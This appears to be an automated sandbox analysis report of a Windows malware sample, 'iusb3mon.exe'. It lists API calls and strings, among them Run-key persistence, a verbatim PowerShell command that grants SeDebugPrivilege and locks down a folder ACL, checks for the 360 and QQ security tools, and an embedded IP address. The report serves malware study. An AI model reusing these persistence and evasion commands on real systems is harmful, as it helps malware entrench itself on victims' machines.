                                                                                                                    • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 06246252
                                                                                                                    • RegSetValueExA.ADVAPI32(?,Microsoft,00000000,00000001,C:\ProgramData\Program\iusb3mon.exe,00000001), ref: 0624626E
                                                                                                                    • RegCloseKey.ADVAPI32(?), ref: 06246278
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000001C.00000002.4577401759.0000000006240000.00000040.00001000.00020000.00000000.sdmp, Offset: 06240000, based on PE: true
                                                                                                                    • Associated: 0000001C.00000002.4577401759.0000000006271000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4577401759.0000000006273000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4577401759.0000000006276000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4577401759.0000000006278000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4577401759.000000000627A000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_28_2_6240000_iusb3mon.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: OpenSleep$CloseFile$FindWindow$ModuleNameValue$CreateExecH_prologHandleMessageProcess32$FirstNextPostSendSnapshotToolhelp32Write
                                                                                                                    • String ID: C:\ProgramData\Microsoft\MicrosoftNetFramework.xml$C:\ProgramData\Program\iusb3mon.exe$Microsoft$Q360SafeMonClass$QQPCTray.exe$SOFTWARE\Microsoft\Windows\CurrentVersion\Run$qqpctray.exe
                                                                                                                    • API String ID: 3575359619-3011562891
                                                                                                                    • Opcode ID: 035068197325e54d88c3624c55127b7628b1c6f45e536df651c954fd3327c4db
                                                                                                                    • Instruction ID: 683e51c70e1dfb654275e9d9842744d88857216f404f982d7d4853891033f5eb
                                                                                                                    • Opcode Fuzzy Hash: 035068197325e54d88c3624c55127b7628b1c6f45e536df651c954fd3327c4db
                                                                                                                    • Instruction Fuzzy Hash: 94A1A271368349BFE2D8BB61AC95E7A7A9DEF40B04F01081DFE95A5481CBB0C9448F62
                                                                                                                    Function 06246587 Relevance: 45.7, APIs: 11, Strings: 15, Instructions: 163filesleepprocessCOMMON
                                                                                                                    Download Yara Rule

                                                                                                                    Control-flow Graph

                                                                                                                    APIs
                                                                                                                    • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 062465AB
                                                                                                                    • CreateDirectoryA.KERNEL32(?,00000000), ref: 06246600
                                                                                                                    • SetFileAttributesA.KERNEL32(?,00000002,0000000A), ref: 0624663D
                                                                                                                    • WinExec.KERNEL32(powershell.exe -NoProfile -C "Set-Content -Value @('[Unicode]','Unicode=yes','[Version]','signature=\"$CHICAGO$\"','Revision=1','[Privilege Rights]','SeDebugPrivilege = *S-1-5-18','[File Security]','\"C:\ProgramData\Program\",0,\"D:AR(D;OICI;DTSDRCWD;;;WD)\"'),00000000), ref: 06246668
                                                                                                                      • Part of subcall function 06247B7D: __EH_prolog.LIBCMT ref: 06247B82
                                                                                                                      • Part of subcall function 06247109: __EH_prolog.LIBCMT ref: 0624710E
                                                                                                                    • GetFileAttributesA.KERNEL32(C:\ProgramData\Program\iusb3mon.exe), ref: 06246673
                                                                                                                    • CopyFileA.KERNEL32(?,?,00000000), ref: 06246690
                                                                                                                    • CopyFileA.KERNEL32(C:\ProgramData\iusb3mon.dat,C:\ProgramData\Program\iusb3mon.dat,00000001), ref: 062466C6
                                                                                                                    • CopyFileA.KERNEL32(C:\ProgramData\templateWatch.dat,C:\ProgramData\Program\templateWatch.dat,00000001), ref: 062466D5
                                                                                                                    • Sleep.KERNEL32(000000C8), ref: 062466DC
                                                                                                                    • WinExec.KERNEL32(cmd /c echo.>c:\inst.ini,00000000), ref: 06246739
                                                                                                                    • Sleep.KERNEL32(000000C8), ref: 06246744
                                                                                                                    Strings
                                                                                                                    • C:\ProgramData\Program\iusb3mon.dat, xrefs: 062466B9, 062466C0, 062466F0
                                                                                                                    • Create Successed!, xrefs: 06246643
                                                                                                                    • C:\ProgramData\templateWatch.dat, xrefs: 062466D0
                                                                                                                    • 360Tray.exe, xrefs: 06246703
                                                                                                                    • cmd /c echo.>c:\inst.ini, xrefs: 06246734
                                                                                                                    • 360tray.exe, xrefs: 06246712
                                                                                                                    • C:\ProgramData\Program\, xrefs: 062465B8
                                                                                                                    • iusb3mon.exe, xrefs: 062465D9
                                                                                                                    • : Not Exist, xrefs: 0624660E
                                                                                                                    • C:\ProgramData\Program\templateWatch.dat, xrefs: 062466C8, 062466CF, 062466F8
                                                                                                                    • C:\ProgramData\Program, xrefs: 062465E7
                                                                                                                    • c:\inst.ini, xrefs: 06246722
                                                                                                                    • powershell.exe -NoProfile -C "Set-Content -Value @('[Unicode]','Unicode=yes','[Version]','signature=\"$CHICAGO$\"','Revision=1','[Privilege Rights]','SeDebugPrivilege = *S-1-5-18','[File Security]','\"C:\ProgramData\Program\",0,\"D:AR(D;OICI;DTSDRCWD;;;WD)\"'), xrefs: 06246663
                                                                                                                    • C:\ProgramData\iusb3mon.dat, xrefs: 062466C1
                                                                                                                    • C:\ProgramData\Program\iusb3mon.exe, xrefs: 0624666E, 062466E4
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000001C.00000002.4577401759.0000000006240000.00000040.00001000.00020000.00000000.sdmp, Offset: 06240000, based on PE: true
                                                                                                                    • Associated: 0000001C.00000002.4577401759.0000000006271000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4577401759.0000000006273000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4577401759.0000000006276000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4577401759.0000000006278000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4577401759.000000000627A000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_28_2_6240000_iusb3mon.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: File$Copy$AttributesExecH_prologSleep$CreateDirectoryModuleName
                                                                                                                    • String ID: : Not Exist$360Tray.exe$360tray.exe$C:\ProgramData\Program$C:\ProgramData\Program\$C:\ProgramData\Program\iusb3mon.dat$C:\ProgramData\Program\iusb3mon.exe$C:\ProgramData\Program\templateWatch.dat$C:\ProgramData\iusb3mon.dat$C:\ProgramData\templateWatch.dat$Create Successed!$c:\inst.ini$cmd /c echo.>c:\inst.ini$iusb3mon.exe$powershell.exe -NoProfile -C "Set-Content -Value @('[Unicode]','Unicode=yes','[Version]','signature=\"$CHICAGO$\"','Revision=1','[Privilege Rights]','SeDebugPrivilege = *S-1-5-18','[File Security]','\"C:\ProgramData\Program\",0,\"D:AR(D;OICI;DTSDRCWD;;;WD)\"')
                                                                                                                    • API String ID: 1478482640-228079196
                                                                                                                    • Opcode ID: 2e7c23485c49af885fa53422e868b1f3d479fce307762253116e96639cdf5f10
                                                                                                                    • Instruction ID: ba43ec8972423323e17e4c2fa6dc17bb8c3c97f428b767622500cd973cfe6a31
                                                                                                                    • Opcode Fuzzy Hash: 2e7c23485c49af885fa53422e868b1f3d479fce307762253116e96639cdf5f10
                                                                                                                    • Instruction Fuzzy Hash: D241C93277434576E5E876B27C89F6F365D9F85B20F010919FE24E60C0DEB4D5808B62
                                                                                                                    Function 0624650A Relevance: 29.8, APIs: 15, Strings: 2, Instructions: 55sleepwindowCOMMON
                                                                                                                    Download Yara Rule

                                                                                                                    Control-flow Graph

                                                                                                                    APIs
                                                                                                                    • FindWindowA.USER32(00000000,0626DD60), ref: 06246521
                                                                                                                    • ShowWindow.USER32(00000000,00000000), ref: 06246525
                                                                                                                    • FindWindowA.USER32(00000000,0626DD54), ref: 0624652D
                                                                                                                    • ShowWindow.USER32(00000000,00000000), ref: 06246531
                                                                                                                    • FindWindowA.USER32(00000000,0626DD44), ref: 06246539
                                                                                                                    • ShowWindow.USER32(00000000,00000000), ref: 0624653D
                                                                                                                    • FindWindowA.USER32(00000000,0626DD38), ref: 06246545
                                                                                                                    • ShowWindow.USER32(00000000,00000000), ref: 06246549
                                                                                                                    • FindWindowA.USER32(00000000,---------==============), ref: 06246551
                                                                                                                    • ShowWindow.USER32(00000000,00000000), ref: 06246555
                                                                                                                    • FindWindowA.USER32(00000000,===========-----------), ref: 0624655D
                                                                                                                    • ShowWindow.USER32(00000000,00000000), ref: 06246561
                                                                                                                    • FindWindowA.USER32(00000000,0626DCF8), ref: 06246569
                                                                                                                    • SendMessageA.USER32(00000000,00000010,00000000,00000000), ref: 06246574
                                                                                                                    • Sleep.KERNEL32(000000C8), ref: 0624657F
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000001C.00000002.4577401759.0000000006240000.00000040.00001000.00020000.00000000.sdmp, Offset: 06240000, based on PE: true
                                                                                                                    • Associated: 0000001C.00000002.4577401759.0000000006271000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4577401759.0000000006273000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4577401759.0000000006276000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4577401759.0000000006278000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4577401759.000000000627A000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_28_2_6240000_iusb3mon.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: Window$Find$Show$MessageSendSleep
                                                                                                                    • String ID: ---------==============$===========-----------
                                                                                                                    • API String ID: 155205692-1512992862
                                                                                                                    • Opcode ID: 44b94ac4c22ee21d7b15dc20aff48e835ebf443c3cc03ce15c99ce79a022cdc7
                                                                                                                    • Instruction ID: 11891ef489c239accb7b9e41731426e52bec036d99aa696303d0ef97411358ba
                                                                                                                    • Opcode Fuzzy Hash: 44b94ac4c22ee21d7b15dc20aff48e835ebf443c3cc03ce15c99ce79a022cdc7
                                                                                                                    • Instruction Fuzzy Hash: 7DF0B7E2FA036D39E9B43BB35CCDD6F1D5CDE956997021C11BA06A205188B8DC80CEB0
                                                                                                                    Function 0624571E Relevance: 14.0, APIs: 6, Strings: 2, Instructions: 46synchronizationsleepCOMMON
                                                                                                                    Download Yara Rule

                                                                                                                    Control-flow Graph

                                                                                                                    APIs
                                                                                                                    • CreateMutexA.KERNEL32(00000000,00000000,LJPXYXC,202.79.169.178,0626CC34,06246CAB), ref: 06245729
                                                                                                                    • GetLastError.KERNEL32 ref: 06245731
                                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 0624573F
                                                                                                                    • Sleep.KERNEL32(000003E8), ref: 06245761
                                                                                                                    • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 0624577F
                                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 06245786
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000001C.00000002.4577401759.0000000006240000.00000040.00001000.00020000.00000000.sdmp, Offset: 06240000, based on PE: true
                                                                                                                    • Associated: 0000001C.00000002.4577401759.0000000006271000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4577401759.0000000006273000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4577401759.0000000006276000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4577401759.0000000006278000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4577401759.000000000627A000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_28_2_6240000_iusb3mon.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: CloseHandle$CreateErrorLastMutexObjectSingleSleepWait
                                                                                                                    • String ID: 202.79.169.178$LJPXYXC
                                                                                                                    • API String ID: 3934243189-1033937695
                                                                                                                    • Opcode ID: 2dc99946951642fe9f9b872443e811e8c14ed0c596a7218037d5eacd9d3004aa
                                                                                                                    • Instruction ID: 6ca4abe5fb959b9ba659564bf3ab0fbcbd81969aec76314b9be46618149bdd85
                                                                                                                    • Opcode Fuzzy Hash: 2dc99946951642fe9f9b872443e811e8c14ed0c596a7218037d5eacd9d3004aa
                                                                                                                    • Instruction Fuzzy Hash: 81F04931927231BBD2B53B227C4DCDB2D1EDF476B1B110610FA5DA4084DA684641CAF2
                                                                                                                    Function 06246780 Relevance: 14.0, APIs: 6, Strings: 2, Instructions: 26threadsleepCOMMON
                                                                                                                    Download Yara Rule

                                                                                                                    Control-flow Graph

                                                                                                                    APIs
                                                                                                                    • SetThreadExecutionState.KERNEL32(80000003), ref: 0624678E
                                                                                                                    • SetThreadExecutionState.KERNEL32(80000003), ref: 06246791
                                                                                                                    • SetThreadExecutionState.KERNEL32(80000001), ref: 0624679C
                                                                                                                    • Sleep.KERNEL32(000003E8), ref: 062467AE
                                                                                                                    • OutputDebugStringA.KERNEL32(Thread running...), ref: 062467B9
                                                                                                                    • OutputDebugStringA.KERNEL32(Thread Exit...), ref: 062467C3
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000001C.00000002.4577401759.0000000006240000.00000040.00001000.00020000.00000000.sdmp, Offset: 06240000, based on PE: true
                                                                                                                    • Associated: 0000001C.00000002.4577401759.0000000006271000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4577401759.0000000006273000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4577401759.0000000006276000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4577401759.0000000006278000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4577401759.000000000627A000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_28_2_6240000_iusb3mon.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: ExecutionStateThread$DebugOutputString$Sleep
                                                                                                                    • String ID: Thread Exit...$Thread running...
                                                                                                                    • API String ID: 3332416543-10974087
                                                                                                                    • Opcode ID: e5e7951f577729938b56c9390870e581b71c1ddff27c51d9dd0ab0a6adef9d09
                                                                                                                    • Instruction ID: dba079147afad2a4a9f65cceb6ccec6d379b43eeb70fa930b314106c7becb565
                                                                                                                    • Opcode Fuzzy Hash: e5e7951f577729938b56c9390870e581b71c1ddff27c51d9dd0ab0a6adef9d09
                                                                                                                    • Instruction Fuzzy Hash: DBE02622F7432A66E3A133B67C84E2A699DDF96620B160427FE04E3104CA605D414FF2
                                                                                                                    Function 06245DA7 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 47windowCOMMON
                                                                                                                    Download Yara Rule

                                                                                                                    Control-flow Graph

                                                                                                                    APIs
                                                                                                                    • PostMessageA.USER32(00000000,00000010,00000000,00000000), ref: 06245DE5
                                                                                                                    • SendMessageA.USER32(00000000,00000010,00000000,00000000), ref: 06245DF0
                                                                                                                    • FindWindowA.USER32(?,00000000), ref: 06245DB1
                                                                                                                      • Part of subcall function 06247B7D: __EH_prolog.LIBCMT ref: 06247B82
                                                                                                                      • Part of subcall function 06247109: __EH_prolog.LIBCMT ref: 0624710E
                                                                                                                    Strings
                                                                                                                    • C:\ProgramData\Program\iusb3mon.exe, xrefs: 06245DA8
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000001C.00000002.4577401759.0000000006240000.00000040.00001000.00020000.00000000.sdmp, Offset: 06240000, based on PE: true
                                                                                                                    • Associated: 0000001C.00000002.4577401759.0000000006271000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4577401759.0000000006273000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4577401759.0000000006276000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4577401759.0000000006278000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4577401759.000000000627A000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_28_2_6240000_iusb3mon.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: H_prologMessage$FindPostSendWindow
                                                                                                                    • String ID: C:\ProgramData\Program\iusb3mon.exe
                                                                                                                    • API String ID: 1670880786-3106534563
                                                                                                                    • Opcode ID: 39c89ce2fc6034b9faeca0578176de5947099def54e9daebec108a7372348201
                                                                                                                    • Instruction ID: 9bca5833c48fcf45ba4b0f597bcf1e807c88124f948506aef919ca1cf3757cdb
                                                                                                                    • Opcode Fuzzy Hash: 39c89ce2fc6034b9faeca0578176de5947099def54e9daebec108a7372348201
                                                                                                                    • Instruction Fuzzy Hash: C5F096723603597FF5ED36607CD9E7E1159CB80F95F110439FA7175180CEB44D414AA6
                                                                                                                    Function 06248D1A Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 34synchronizationCOMMON
                                                                                                                    Download Yara Rule

                                                                                                                    Control-flow Graph

                                                                                                                    APIs
                                                                                                                    • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 06248D33
                                                                                                                      • Part of subcall function 0624B39D: CreateThread.KERNEL32(?,06248D56,0624B408,00000000,00000000,?), ref: 0624B3DE
                                                                                                                      • Part of subcall function 0624B39D: GetLastError.KERNEL32(?,06248D56,?,?,06248CE2,?,?,?), ref: 0624B3E8
                                                                                                                    • WaitForSingleObject.KERNEL32(?,000000FF), ref: 06248D60
                                                                                                                    • CloseHandle.KERNEL32(?), ref: 06248D69
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000001C.00000002.4577401759.0000000006240000.00000040.00001000.00020000.00000000.sdmp, Offset: 06240000, based on PE: true
                                                                                                                    • Associated: 0000001C.00000002.4577401759.0000000006271000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4577401759.0000000006273000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4577401759.0000000006276000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4577401759.0000000006278000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4577401759.000000000627A000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_28_2_6240000_iusb3mon.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: Create$CloseErrorEventHandleLastObjectSingleThreadWait
                                                                                                                    • String ID: G&
                                                                                                                    • API String ID: 3117531959-2298792099
                                                                                                                    • Opcode ID: 22feadaf96394ce2980d9b60b9636a177840e725dac3546bdb7df7431f70caab
                                                                                                                    • Instruction ID: 66f56e87c87cd1b8018c085b4f987935f2c3738c26c94283a77e4d9d05ad6b12
                                                                                                                    • Opcode Fuzzy Hash: 22feadaf96394ce2980d9b60b9636a177840e725dac3546bdb7df7431f70caab
                                                                                                                    • Instruction Fuzzy Hash: 3DF0BDB290021ABFDF01AFA4DD05CEE7BB9FB08210B504565FE25E6254E7319E219F91
                                                                                                                    Function 06247AC4 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 31fileCOMMON
                                                                                                                    Download Yara Rule

                                                                                                                    Control-flow Graph

                                                                                                                    • Executed
                                                                                                                    • Not Executed
                                                                                                                    control_flow_graph 461 6247ac4-6247afa CreateFileA WriteFile 462 6247afc 461->462 463 6247afe-6247b0a CloseHandle 461->463 462->463
                                                                                                                    APIs
                                                                                                                    • CreateFileA.KERNEL32(?,40000000,00000001,00000000,00000002,00000000,00000000,C:\ProgramData\Program\iusb3mon.exe,00000000,06278518,06246098,C:\ProgramData\Microsoft\MicrosoftNetFramework.xml,0000000A), ref: 06247ADA
                                                                                                                    • WriteFile.KERNEL32(00000000,06268760,00000EE2,?,00000000), ref: 06247AF2
                                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 06247AFF
                                                                                                                    Strings
                                                                                                                    • C:\ProgramData\Program\iusb3mon.exe, xrefs: 06247ACA
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000001C.00000002.4577401759.0000000006240000.00000040.00001000.00020000.00000000.sdmp, Offset: 06240000, based on PE: true
                                                                                                                    • Associated: 0000001C.00000002.4577401759.0000000006271000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4577401759.0000000006273000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4577401759.0000000006276000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4577401759.0000000006278000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4577401759.000000000627A000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_28_2_6240000_iusb3mon.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: File$CloseCreateHandleWrite
                                                                                                                    • String ID: C:\ProgramData\Program\iusb3mon.exe
                                                                                                                    • API String ID: 1065093856-3106534563
                                                                                                                    • Opcode ID: 6b52916c3221ae31a7612b147a978e365c65c51a7713955c97ad0387549928fa
                                                                                                                    • Instruction ID: 448e4eb68025ff14b864a367b03e391cf5843e8e2127389ad43cc05f6cf603ed
                                                                                                                    • Opcode Fuzzy Hash: 6b52916c3221ae31a7612b147a978e365c65c51a7713955c97ad0387549928fa
                                                                                                                    • Instruction Fuzzy Hash: 03E09A7628132C7FFA201E61ACCAFEB3A0EEB01698F004121FB04E9540C6A19E408AB0
                                                                                                                    Function 0625CD41 Relevance: 6.1, APIs: 4, Instructions: 63COMMON
                                                                                                                    Download Yara Rule

                                                                                                                    Control-flow Graph

                                                                                                                    APIs
                                                                                                                    • GetVersion.KERNEL32(?,?,?,0625CD3C), ref: 0625CDB8
                                                                                                                    • GetProcessVersion.KERNEL32(00000000,?,?,?,0625CD3C), ref: 0625CDF5
                                                                                                                    • LoadCursorA.USER32(00000000,00007F02), ref: 0625CE23
                                                                                                                    • LoadCursorA.USER32(00000000,00007F00), ref: 0625CE2E
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000001C.00000002.4577401759.0000000006240000.00000040.00001000.00020000.00000000.sdmp, Offset: 06240000, based on PE: true
                                                                                                                    • Associated: 0000001C.00000002.4577401759.0000000006271000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4577401759.0000000006273000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4577401759.0000000006276000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4577401759.0000000006278000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4577401759.000000000627A000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_28_2_6240000_iusb3mon.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: CursorLoadVersion$Process
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2246821583-0
                                                                                                                    • Opcode ID: ef813a60deda1d8634fccd670bd15cb4e62a5bb4c806c1d9fd2239f0166b0b1e
                                                                                                                    • Instruction ID: 2af9b4d5c1bfdcf79fc5a8e451f2c1b3afde090e1a52cac61f04b6e3c17a8615
                                                                                                                    • Opcode Fuzzy Hash: ef813a60deda1d8634fccd670bd15cb4e62a5bb4c806c1d9fd2239f0166b0b1e
                                                                                                                    • Instruction Fuzzy Hash: C0112BB1A507508FD7749F3A989452ABBE5FB487057414D3ED587C6A40DA74A5008F90
                                                                                                                    Function 001D5B68 Relevance: 6.1, APIs: 4, Instructions: 53timethreadCOMMONLIBRARYCODE
                                                                                                                    Download Yara Rule

                                                                                                                    Control-flow Graph

                                                                                                                    APIs
                                                                                                                    • ___std_exception_copy.LIBVCRUNTIME ref: 001D121E
                                                                                                                      • Part of subcall function 001D6F34: RaiseException.KERNEL32(E06D7363,00000001,00000003,001D11FC,?,?,?,?,001D11FC,?,001FA814), ref: 001D6F94
                                                                                                                    • GetSystemTimeAsFileTime.KERNEL32(00000000), ref: 001D6571
                                                                                                                    • GetCurrentThreadId.KERNEL32 ref: 001D6580
                                                                                                                    • GetCurrentProcessId.KERNEL32 ref: 001D6589
                                                                                                                    • QueryPerformanceCounter.KERNEL32(?), ref: 001D6596
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000001C.00000002.4571601291.00000000001D1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 001D0000, based on PE: true
                                                                                                                    • Associated: 0000001C.00000002.4571337549.00000000001D0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4571918062.00000000001EE000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4572153673.00000000001FC000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4572420177.00000000001FE000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4572664793.0000000000203000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4572895265.0000000000204000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4573068486.0000000000206000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4573068486.000000000026C000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4573068486.000000000026E000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4573068486.0000000000270000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4573068486.0000000000274000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4573068486.0000000000276000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4573068486.0000000000278000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4573068486.000000000027A000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4573068486.000000000028A000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4573068486.000000000028C000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4573068486.0000000000293000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4573068486.0000000000295000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4573068486.0000000000297000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4573068486.0000000000299000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4573068486.000000000029B000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4573068486.000000000029E000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4573068486.00000000002A1000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4573068486.00000000002A5000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4573068486.00000000002AA000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4573068486.00000000002B0000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4573068486.00000000002B2000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4573068486.00000000002BA000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4573068486.00000000002C0000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4573068486.00000000002C6000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4573068486.00000000002C8000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4573068486.00000000002ED000.00000040.00000001.01000000.0000000D.sdmpDownload File
